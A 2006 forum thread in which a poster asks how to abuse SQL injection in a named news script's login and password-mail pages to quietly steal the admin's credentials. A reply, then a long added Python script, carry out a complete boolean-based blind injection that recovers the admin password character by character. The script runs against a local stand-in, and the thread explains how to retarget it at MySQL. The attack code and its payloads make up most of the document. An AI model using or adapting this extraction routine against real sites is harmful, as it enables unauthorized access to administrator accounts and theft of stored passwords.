theblacksheep
Hi, lately I have seen quite a few scripts with the following login procedure:

-------------------------------------------------------------------
// $news_user is put into the query string unescaped
$login_rs = mysql_query("SELECT id, pass FROM user WHERE login='$news_user'");
if(mysql_num_rows($login_rs) > 0){
    $login_array = mysql_fetch_array($login_rs);
    // the password is compared in PHP, not in the query
    if($login_array["pass"] == $news_pass){
        ...
    } else {
        $login_err=TRUE;
    }
} else {
    $login_err=TRUE;
}
-------------------------------------------------------------------

I can't think of a way to use this for a successful SQL injection (getting the admin's id and pass). The output is always the same unless I really enter the correct pass (at least I do not have to guess the user).

Nevertheless, there is often the option to retrieve the pass via email.

-------------------------------------------------------------------
// $email is put into the query string unescaped
$email_rs = mysql_query("SELECT * FROM user WHERE email='$email'");
$email_array = mysql_fetch_array($email_rs);
if(mysql_num_rows($email_rs)>0){
    ...
    $msg = ("The password has been sent.");
} else {
    $msg = ("Unknown email address!");
}
-------------------------------------------------------------------

I can use this code for intelligent password guessing because I do get two different outputs depending on success or failure.

Example: a' or length(pass)<10/*

This should give me the output "The password has been sent." if the pass is no longer than 9 chars. The problem is that every time I am successful with my guessing the script tries to send an email.

Any ideas how to use those two code snippets to retrieve the admin's data without causing a huge sensation?

tbs

Example: Scarnews v1.2.1
Posted 29.05.2006 11:34:58 (edited by theblacksheep on 29.05.2006 11:36:27)
unknown user |
I guess it depends whether or not they use your user input as the email address to send the data to, or the one retrieved from the DB.
Posted 29.05.2006 12:33:56
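The two posts above describe a boolean-based blind injection through the "send my password" page (two distinguishable messages, one of which also triggers a mail) and ask how much noise that makes. The following is an added example, not code from the thread or from Scarnews: it runs the full extraction offline against an sqlite3 stand-in for the PHP snippet, using the same unescaped interpolation of $email and the same two messages. The table `user` with columns `id`, `login`, `pass`, `email` comes from the thread; the sample rows, the use of sqlite3 instead of MySQL, the `unicode()` function, and the assumption (the worst case from the reply) that the script mails the address found in the DB row rather than the submitted one are assumptions of this example. It also goes beyond the post's single payload to the general procedure: binary search on the length, then on each character, with the condition restricted to the admin row.

```python
"""Blind extraction of the admin password through the password-mail oracle.

Added example for the thread above; not the original script's code.
Assumptions: sqlite3 stands in for MySQL, the mailer sends to the address
stored in the matching DB row, and the admin's login is literally 'admin'.
"""
import sqlite3

SENT = "The password has been sent."
UNKNOWN = "Unknown email address!"

# Constructed sample data; the password is what the attack recovers.
_ADMIN_PASS = "s3cr3t"


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user (id INTEGER, login TEXT, pass TEXT, email TEXT)")
    db.execute("INSERT INTO user VALUES (1, 'admin', ?, 'admin@example.org')",
               (_ADMIN_PASS,))
    db.execute("INSERT INTO user VALUES (2, 'bob', 'hunter2', 'bob@example.org')")
    db.commit()
    return db


class VulnerableMailer:
    """Stand-in for the PHP password-mail script from the thread."""

    def __init__(self, db: sqlite3.Connection):
        self.db = db
        self.queries = 0        # every request the attacker sends
        self.mails_sent = []    # addresses the script "mailed" (assumed: from the DB row)

    def lookup(self, email: str) -> str:
        # The bug, exactly as in the PHP: $email is concatenated into the query.
        sql = "SELECT * FROM user WHERE email='" + email + "'"
        self.queries += 1
        rows = self.db.execute(sql).fetchall()
        if rows:
            # mysql_fetch_array($email_rs) gives the first matching row; we assume
            # the mail goes to that row's email column (worst case for the attacker).
            self.mails_sent.append(rows[0][3])
            return SENT
        return UNKNOWN


def ask(oracle: VulnerableMailer, condition: str) -> bool:
    """One yes/no question about the admin row, phrased like the post's payload.

    The post's "a' or length(pass)<10/*" is true if *any* user has a short
    password, so the condition is AND-ed with login='admin' here.
    """
    payload = "a' or (login='admin' and " + condition + ")/*"
    return oracle.lookup(payload) == SENT


def find_length(oracle: VulnerableMailer, max_len: int = 64) -> int:
    """Smallest n with length(pass) <= n, by binary search (at most 7 queries)."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(oracle, "length(pass)<=%d" % mid):
            hi = mid
        else:
            lo = mid + 1
    return lo


def find_char(oracle: VulnerableMailer, pos: int) -> str:
    """Binary search on the code point of character `pos` (1-based), printable ASCII.

    Comparing ordinals rather than characters sidesteps collation: in MySQL the
    default case-insensitive collation would make 'A' < 'b' comparisons lie.
    unicode() is sqlite's function; ascii() is the MySQL equivalent.
    """
    lo, hi = 32, 126
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(oracle, "unicode(substr(pass,%d,1))<=%d" % (pos, mid)):
            hi = mid
        else:
            lo = mid + 1
    return chr(lo)


def extract_password(oracle: VulnerableMailer) -> str:
    n = find_length(oracle)
    return "".join(find_char(oracle, i) for i in range(1, n + 1))


if __name__ == "__main__":
    o = VulnerableMailer(make_db())
    print("post's payload ->", o.lookup("a' or length(pass)<10/*"))
    o = VulnerableMailer(make_db())
    print("recovered:", extract_password(o))
    print("requests: %d, mails triggered: %d (to %s)"
          % (o.queries, len(o.mails_sent), sorted(set(o.mails_sent))))
```

Running it shows the cost the first post worries about: roughly half of the binary-search answers are "yes", and under the assumption that the script mails the stored address, every "yes" is a password mail to the admin. If, as the reply suggests, the script instead mails the submitted address, those mails go to the injected string and nobody sees them; which of the two the script does is the first thing to check in the source. Substitute `ascii()` for `unicode()` and drop the sqlite3 stand-in to run the same payloads against MySQL.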